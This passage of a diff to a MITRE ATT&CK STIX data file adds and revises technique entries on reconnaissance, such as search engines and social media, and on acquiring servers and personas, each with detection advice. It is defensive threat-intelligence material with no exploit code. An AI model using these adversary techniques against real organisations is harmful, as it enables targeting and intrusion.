"attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "modified": "2020-10-24T04:15:53.892Z", + "created": "2020-10-02T17:01:42.558Z", + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "PRE" + ] + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1593.002", + "url": "https://attack.mitre.org/techniques/T1593/002" + }, + { + "source_name": "SecurityTrails Google Hacking", + "url": "https://securitytrails.com/blog/google-hacking-techniques", + "description": "Borges, E. (2019, March 5). Exploring Google Hacking Techniques. Retrieved October 20, 2020." + }, + { + "source_name": "ExploitDB GoogleHacking", + "url": "https://www.exploit-db.com/google-hacking-database", + "description": "Offensive Security. (n.d.). Google Hacking Database. Retrieved October 23, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Search Engines", + "description": "Before compromising a victim, adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)\n\nAdversaries may craft various search engine queries depending on what information they seek to gather. Threat actors may use search engines to harvest general information about victims, as well as use specialized queries to look for spillages/leaks of sensitive information such as network details or credentials. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Valid Accounts](https://attack.mitre.org/techniques/T1078) or [Phishing](https://attack.mitre.org/techniques/T1566)).", + "id": "attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "modified": "2020-10-24T04:22:11.245Z", + "created": "2020-10-02T16:50:12.809Z", + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1596", + "url": "https://attack.mitre.org/techniques/T1596" + }, + { + "source_name": "WHOIS", + "url": "https://www.whois.net/", + "description": "NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020." + }, + { + "source_name": "DNS Dumpster", + "url": "https://dnsdumpster.com/", + "description": "Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020." + }, + { + "source_name": "Circl Passive DNS", + "url": "https://www.circl.lu/services/passive-dns/", + "description": "CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020." + }, + { + "source_name": "Medium SSL Cert", + "url": "https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2", + "description": "Jain, M. (2019, September 16). Export & Download \u2014 SSL Certificate from Server (Site URL). Retrieved October 20, 2020." + }, + { + "source_name": "SSLShopper Lookup", + "url": "https://www.sslshopper.com/ssl-checker.html", + "description": "SSL Shopper. (n.d.). SSL Checker. Retrieved October 20, 2020." + }, + { + "source_name": "DigitalShadows CDN", + "url": "https://www.digitalshadows.com/blog-and-research/content-delivery-networks-cdns-can-leave-you-exposed-how-you-might-be-affected-and-what-you-can-do-about-it/", + "description": "Swisscom & Digital Shadows. (2017, September 6). Content Delivery Networks (CDNs) Can Leave You Exposed \u2013 How You Might Be Affected And What You Can Do About It. Retrieved October 20, 2020." + }, + { + "source_name": "Shodan", + "url": "https://shodan.io", + "description": "Shodan. (n.d.). Shodan. Retrieved October 20, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Search Open Technical Databases", + "description": "Before compromising a victim, adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS)(Citation: Medium SSL Cert)(Citation: SSLShopper Lookup)(Citation: DigitalShadows CDN)(Citation: Shodan)\n\nAdversaries may search in different open databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", + "id": "attack-pattern--55fc4df0-b42c-479a-b860-7a6761bcaad0", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "modified": "2020-10-24T04:20:44.166Z", + "created": "2020-10-02T16:56:05.810Z", + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "PRE" + ] + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1593", + "url": "https://attack.mitre.org/techniques/T1593" + }, + { + "source_name": "Cyware Social Media", + "url": "https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e", + "description": "Cyware Hacker News. (2019, October 2). How Hackers Exploit Social Media To Break Into Your Company. Retrieved October 20, 2020." + }, + { + "source_name": "SecurityTrails Google Hacking", + "url": "https://securitytrails.com/blog/google-hacking-techniques", + "description": "Borges, E. (2019, March 5). Exploring Google Hacking Techniques. Retrieved October 20, 2020." + }, + { + "source_name": "ExploitDB GoogleHacking", + "url": "https://www.exploit-db.com/google-hacking-database", + "description": "Offensive Security. (n.d.). Google Hacking Database. Retrieved October 23, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Search Open Websites/Domains", + "description": "Before compromising a victim, adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)\n\nAdversaries may search in different online sites depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Phishing](https://attack.mitre.org/techniques/T1566)).", + "id": "attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "modified": "2020-10-24T04:22:46.374Z", + "created": "2020-10-02T16:48:04.509Z", + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "PRE" + ] + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1594", + "url": "https://attack.mitre.org/techniques/T1594" + }, + { + "source_name": "Comparitech Leak", + "url": "https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/", + "description": "Bischoff, P. (2020, October 15). Broadvoice database of more than 350 million customer records exposed online. Retrieved October 20, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Search Victim-Owned Websites", + "description": "Before compromising a victim, adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)\n\nAdversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).", + "id": "attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "modified": "2020-10-24T04:23:37.282Z", + "created": "2020-10-02T16:51:50.306Z", + "x_mitre_data_sources": [ + "Web logs" + ], + "x_mitre_detection": "Monitor for suspicious network traffic that could be indicative of adversary reconnaissance, such as rapid successions of requests indicative of web crawling and/or large quantities of requests originating from a single source (especially if the source is known to be associated with an adversary). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "PRE" + ] + }, { "external_references": [ { @@ -24446,10 +28161,15 @@ "external_id": "T1518.001", "url": "https://attack.mitre.org/techniques/T1518/001" }, + { + "external_id": "CAPEC-581", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/581.html" + }, { "source_name": "Expel IO Evil in AWS", "url": "https://expel.io/blog/finding-evil-in-aws/", - "description": "Anthony Randazzo, Britton Manahan and Sam Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020." + "description": "A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020." } ], "object_marking_refs": [ @@ -24466,7 +28186,7 @@ "phase_name": "discovery" } ], - "modified": "2020-06-29T17:32:24.787Z", + "modified": "2020-09-16T19:36:16.978Z", "created": "2020-02-21T21:16:18.066Z", "x_mitre_data_sources": [ "Stackdriver logs", @@ -24480,7 +28200,7 @@ "User" ], "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nIn cloud environments, additionally monitor logs for the usage of APIs that may be used to gather information about security software configurations within the environment.", - "x_mitre_version": "1.0", + "x_mitre_version": "1.1", "x_mitre_is_subtechnique": true, "x_mitre_platforms": [ "Linux", @@ -24655,6 +28375,73 @@ "macOS" ] }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1583.004", + "url": "https://attack.mitre.org/techniques/T1583/004" + }, + { + "source_name": "NYTStuxnet", + "description": "William J. Broad, John Markoff, and David E. Sanger. (2011, January 15). Israeli Test on Worm Called Crucial in Iran Nuclear Delay. Retrieved March 1, 2017.", + "url": "https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Server", + "description": "Before compromising a victim, adversaries may buy, lease, or rent physical servers\u00a0that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations.\n\nAdversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet)", + "id": "attack-pattern--60c4b628-4807-4b0b-bbf5-fdac8643c337", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "modified": "2020-10-12T16:49:11.340Z", + "created": "2020-10-01T00:48:09.578Z", + "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1584.004", + "url": "https://attack.mitre.org/techniques/T1584/004" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Server", + "description": "Before compromising a victim, adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations.\n\nAdversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).", + "id": "attack-pattern--e196b5c5-8118-4a1c-ab8a-936586ce3db5", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "modified": "2020-10-12T19:48:07.710Z", + "created": "2020-10-01T00:56:25.135Z", + "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, { "id": "attack-pattern--d456de47-a16f-4e46-8980-e67478a12dcb", "description": "Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications.", @@ -24682,7 +28469,7 @@ "phase_name": "persistence" } ], - "modified": "2020-04-17T17:47:57.075Z", + "modified": "2020-09-16T19:34:19.961Z", "created": "2019-06-28T17:52:07.296Z", "x_mitre_is_subtechnique": false, "x_mitre_platforms": [ @@ -24777,6 +28564,21 @@ "external_id": "T1499.002", "url": "https://attack.mitre.org/techniques/T1499/002" }, + { + "external_id": "CAPEC-488", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/488.html" + }, + { + "external_id": "CAPEC-489", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/489.html" + }, + { + "external_id": "CAPEC-528", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/528.html" + }, { "source_name": "Arbor AnnualDoSreport Jan 2018", "url": "https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf", @@ -24812,9 +28614,9 @@ "phase_name": "impact" } ], - "modified": "2020-03-29T01:52:53.947Z", + "modified": "2020-09-16T15:56:03.131Z", "created": "2020-02-20T15:31:43.613Z", - "x_mitre_version": "1.0", + "x_mitre_version": "1.1", "x_mitre_is_subtechnique": true, "x_mitre_impact_type": [ "Availability" @@ -24917,20 +28719,23 @@ "phase_name": "impact" } ], - "modified": "2020-07-14T19:34:47.636Z", + "modified": "2020-07-24T15:36:08.042Z", "created": "2019-03-29T19:00:55.901Z", "x_mitre_is_subtechnique": false, "x_mitre_platforms": [ - "Windows" + "Windows", + "Linux", + "macOS" ], "x_mitre_permissions_required": [ "Administrator", "SYSTEM", "User" ], - "x_mitre_version": "1.0", - "x_mitre_detection": "Monitor processes and command-line arguments to see if critical processes are terminated or stop running.\n\nMonitor Registry edits for modifications to services and startup programs that correspond to services of high importance. Look for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Service information is stored in the Registry at HKLM\\SYSTEM\\CurrentControlSet\\Services.\n\nAlterations to the service binary path or the service startup type changed to disabled may be suspicious.\n\nRemote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, ChangeServiceConfigW may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)", + "x_mitre_version": "1.1", + "x_mitre_detection": "Monitor processes and command-line arguments to see if critical processes are terminated or stop running.\n\nMonitor for edits for modifications to services and startup programs that correspond to services of high importance. Look for changes to services that do not correlate with known software, patch cycles, etc. Windows service information is stored in the Registry at HKLM\\SYSTEM\\CurrentControlSet\\Services. Systemd service unit files are stored within the /etc/systemd/system, /usr/lib/systemd/system/, and /home/.config/systemd/user/ directories, as well as associated symbolic links.\n\nAlterations to the service binary path or the service startup type changed to disabled may be suspicious.\n\nRemote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, ChangeServiceConfigW may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)", "x_mitre_data_sources": [ + "File monitoring", "Process command-line parameters", "Process monitoring", "Windows Registry", @@ -24948,9 +28753,9 @@ "url": "https://attack.mitre.org/techniques/T1574/010" }, { - "external_id": "CAPEC-CAPEC", + "external_id": "CAPEC-17", "source_name": "capec", - "url": "https://capec.mitre.org/data/definitions/CAPEC.html" + "url": "https://capec.mitre.org/data/definitions/17.html" } ], "object_marking_refs": [ @@ -24975,7 +28780,7 @@ "phase_name": "defense-evasion" } ], - "modified": "2020-03-26T19:37:28.912Z", + "modified": "2020-09-16T19:10:04.262Z", "created": "2020-03-12T20:43:53.998Z", "x_mitre_contributors": [ "Travis Smith, Tripwire", @@ -25010,9 +28815,9 @@ "url": "https://attack.mitre.org/techniques/T1574/011" }, { - "external_id": "CAPEC-CAPEC", + "external_id": "CAPEC-478", "source_name": "capec", - "url": "https://capec.mitre.org/data/definitions/CAPEC.html" + "url": "https://capec.mitre.org/data/definitions/478.html" }, { "source_name": "Registry Key Security", @@ -25057,7 +28862,7 @@ "phase_name": "defense-evasion" } ], - "modified": "2020-06-20T22:01:09.906Z", + "modified": "2020-09-16T19:07:48.590Z", "created": "2020-03-13T11:42:14.444Z", "x_mitre_defense_bypassed": [ "Application control" @@ -25409,7 +29214,7 @@ "phase_name": "defense-evasion" } ], - "modified": "2020-06-20T22:39:02.045Z", + "modified": "2020-10-21T18:37:15.275Z", "created": "2018-04-18T17:59:24.739Z", "x_mitre_is_subtechnique": false, "x_mitre_platforms": [ @@ -25546,6 +29351,171 @@ "Windows" ] }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1593.001", + "url": "https://attack.mitre.org/techniques/T1593/001" + }, + { + "source_name": "Cyware Social Media", + "url": "https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e", + "description": "Cyware Hacker News. (2019, October 2). How Hackers Exploit Social Media To Break Into Your Company. Retrieved October 20, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Social Media", + "description": "Before compromising a victim, adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.\n\nAdversaries may search in different social media sites depending on what information they seek to gather. Threat actors may passively harvest data from these sites, as well as use information gathered to create fake profiles/groups to elicit victim\u2019s into revealing specific information (i.e. [Spearphishing Service](https://attack.mitre.org/techniques/T1598/001)).(Citation: Cyware Social Media) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).", + "id": "attack-pattern--bbe5b322-e2af-4a5e-9625-a4e62bf84ed3", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "modified": "2020-10-24T04:22:46.235Z", + "created": "2020-10-02T16:49:31.262Z", + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1585.001", + "url": "https://attack.mitre.org/techniques/T1585/001" + }, + { + "source_name": "NEWSCASTER2014", + "description": "Lennon, M. (2014, May 29). Iranian Hackers Targeted US Officials in Elaborate Social Media Attack Operation. Retrieved March 1, 2017.", + "url": "https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation" + }, + { + "source_name": "BlackHatRobinSage", + "description": "Ryan, T. (2010). \u201cGetting In Bed with Robin Sage.\u201d. Retrieved March 6, 2017.", + "url": "http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Social Media Accounts", + "description": "Before compromising a victim, adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries can create social media accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)\n\nFor operations incorporating social engineering, the utilization of a persona on social media may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single social media site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Establishing a persona on social media may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos. \n\nOnce a persona has been developed an adversary can use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) These accounts may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).", + "id": "attack-pattern--b1ccd744-3f78-4a0e-9bb2-2002057f7928", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "modified": "2020-10-20T17:58:13.557Z", + "created": "2020-10-01T01:08:41.124Z", + "x_mitre_data_sources": [ + "Social media monitoring" + ], + "x_mitre_detection": "Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1586.001", + "url": "https://attack.mitre.org/techniques/T1586/001" + }, + { + "source_name": "AnonHBGary", + "description": "Bright, P. (2011, February 15). Anonymous speaks: the inside story of the HBGary hack. Retrieved March 9, 2017.", + "url": "https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/" + }, + { + "source_name": "NEWSCASTER2014", + "description": "Lennon, M. (2014, May 29). Iranian Hackers Targeted US Officials in Elaborate Social Media Attack Operation. Retrieved March 1, 2017.", + "url": "https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation" + }, + { + "source_name": "BlackHatRobinSage", + "description": "Ryan, T. (2010). \u201cGetting In Bed with Robin Sage.\u201d. Retrieved March 6, 2017.", + "url": "http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Social Media Accounts", + "description": "Before compromising a victim, adversaries may compromise social media accounts that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating social media profiles (i.e. [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001)), adversaries may compromise existing social media accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. \n\nA variety of methods exist for compromising social media accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising social media accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.\n\nPersonas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Compromised social media accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.\n\nAdversaries can use a compromised social media profile to create new, or hijack existing, connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) Compromised profiles may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).", + "id": "attack-pattern--274770e0-2612-4ccf-a678-ef8e7bad365d", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "modified": "2020-10-20T17:57:43.708Z", + "created": "2020-10-01T01:18:35.535Z", + "x_mitre_data_sources": [ + "Social media monitoring" + ], + "x_mitre_detection": "Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1592.002", + "url": "https://attack.mitre.org/techniques/T1592/002" + }, + { + "source_name": "ATT ScanBox", + "url": "https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks", + "description": "Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks. Retrieved October 19, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Software", + "description": "Before compromising a victim, adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the installed software may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or for initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).", + "id": "attack-pattern--baf60e1a-afe5-4d31-830f-1b1ba2351884", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "modified": "2020-10-24T03:53:39.162Z", + 